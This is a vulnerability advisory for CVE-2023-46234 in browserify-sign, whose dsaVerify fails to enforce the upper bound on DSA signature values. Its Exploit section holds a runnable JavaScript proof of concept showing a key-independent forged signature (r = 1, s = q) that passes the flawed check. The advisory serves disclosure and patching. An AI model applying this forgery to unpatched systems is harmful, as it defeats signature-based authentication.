PT-2023-9034 · Unknown+5 · Browserify-Sign+5
Roadicing
·
Published
2023-10-26
·
Updated
2025-06-25
·
CVE-2023-46234
CVSS v2.0
7.8
High
| Vector | AV:N/AC:L/Au:N/C:N/I:C/A:N |
Name of the Vulnerable Software and Affected Versions
browserify-sign versions prior to 4.2.2
Description
The dsaVerify function in browserify-sign before 4.2.2 does not enforce the upper bound on the signature values it is supposed to check against the DSA group order q: the comparison meant to reject out-of-range values never triggers. An attacker can therefore construct a signature that is accepted as valid under any DSA public key, which is a signature forgery. Every code path in a dependent project that verifies user-supplied DSA signatures with this function is affected.
Recommendations
Update to browserify-sign 4.2.2 or later. Until the update is deployed, do not rely on dsaVerify for signatures that originate from untrusted input: disable the function, or remove DSA verification from the affected API endpoints, and restrict access to the parts of the project that verify user-supplied DSA signatures to reduce the exposure. browserify-sign is usually a transitive dependency (it is pulled in through crypto-browserify and the browser polyfills bundlers ship), so audit the full dependency tree rather than only direct dependencies.
Exploit
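The following is an added illustration of the flawed bound check and is not browserify-sign's own code. It is a toy DSA verifier over constructed parameters (P, Q, G, X, Y are small example values, not a real key) whose range check on r and s is written twice: checkValueVulnerable mirrors the shape of the pre-4.2.2 check as I read the 4.2.2 diff (the -1/0/1 result of a bignum compare tested against q instead of against 0), and checkValueFixed is the corrected form. The names modPow, invm, cmp, dsaSign, dsaVerify, tryVerify and FORGED are my own. One assumption is marked in the code: the modular-inverse helper returns 0 for a non-invertible input such as s = q, which is how I read bn.js's egcd, and that behaviour is what makes the key-independent forgery verify.

```javascript
// Added illustration (not browserify-sign's code): a toy DSA verifier whose
// range check on r and s is written the vulnerable way and the fixed way.
// Constructed toy parameters: Q divides P - 1 and G has order Q mod P.
const P = 23n;
const Q = 11n;
const G = 4n;            // 2^((P-1)/Q) mod P, has order 11
const X = 7n;            // private key, used only to produce a genuine signature
const Y = 8n;            // public key: G^X mod P

function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  for (let e = exp; e > 0n; e >>= 1n) {
    if (e & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
  }
  return result;
}

// Modular inverse via extended Euclid. Assumption: like the library's bignum
// invm (as read from bn.js's egcd), a non-invertible input such as s = q
// yields 0 instead of raising an error.
function invm(a, m) {
  let [r0, r1] = [((a % m) + m) % m, m];
  let [s0, s1] = [1n, 0n];
  while (r1 !== 0n) {
    const qt = r0 / r1;
    [r0, r1] = [r1, r0 - qt * r1];
    [s0, s1] = [s1, s0 - qt * s1];
  }
  return r0 === 1n ? ((s0 % m) + m) % m : 0n;
}

// bn.js-style three-way comparison: the result is only ever -1, 0 or 1.
function cmp(a, b) {
  return a < b ? -1n : a > b ? 1n : 0n;
}

// Vulnerable shape (browserify-sign < 4.2.2): the -1/0/1 result of cmp is
// compared against q itself, which is never true for q > 1, so the upper
// bound is never enforced. Only the lower bound (b > 0) works.
function checkValueVulnerable(b, q) {
  if (cmp(b, 0n) <= 0n) throw new Error('invalid sig');
  if (cmp(b, q) >= q) throw new Error('invalid sig');
}

// Fixed shape (4.2.2): reject b >= q.
function checkValueFixed(b, q) {
  if (cmp(b, 0n) <= 0n) throw new Error('invalid sig');
  if (cmp(b, q) >= 0n) throw new Error('invalid sig');
}

// Textbook DSA signing with a caller-supplied nonce k (toy, deterministic).
function dsaSign(hash, k) {
  const r = modPow(G, k, P) % Q;
  const s = (invm(k, Q) * (hash + X * r)) % Q;
  return { r, s };
}

// Textbook DSA verification, parameterised by the range check in use.
function dsaVerify(hash, r, s, checkValue) {
  checkValue(s, Q);
  checkValue(r, Q);
  const w = invm(s, Q);
  const u1 = (hash * w) % Q;
  const u2 = (r * w) % Q;
  const v = ((modPow(G, u1, P) * modPow(Y, u2, P)) % P) % Q;
  return v === r;
}

// Reports a verification attempt as 'accepted', 'bad' or 'rejected' (threw).
function tryVerify(hash, r, s, checkValue) {
  try {
    return dsaVerify(hash, r, s, checkValue) ? 'accepted' : 'bad';
  } catch (e) {
    return 'rejected';
  }
}

// Forged signature that depends on neither the key nor the message: s = q
// passes the broken upper-bound check, makes w = 0, hence u1 = u2 = 0 and
// v = (G^0 * Y^0 mod P) mod Q = 1, so r = 1 verifies.
const FORGED = { r: 1n, s: Q };

const genuine = dsaSign(5n, 3n);
console.log('genuine:', tryVerify(5n, genuine.r, genuine.s, checkValueVulnerable),
            '/', tryVerify(5n, genuine.r, genuine.s, checkValueFixed));
console.log('forged: ', tryVerify(5n, FORGED.r, FORGED.s, checkValueVulnerable),
            '/', tryVerify(5n, FORGED.r, FORGED.s, checkValueFixed));
```

The genuine signature is accepted by both checks; the forged pair (r = 1, s = q) is accepted by the vulnerable check for every hash value, and rejected by the fixed one because s = q is no longer in range. Nothing in the arithmetic depends on the toy sizes, so the same (r, s) shape applies to a real group order.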
Fix
Fixed in browserify-sign 4.2.2.
Weakness Enumeration
Improper Verification of Cryptographic Signature
Related identifiers
Affected products
Astra Linux
Confluence
Linuxmint
Red Os
Ubuntu
Browserify-Sign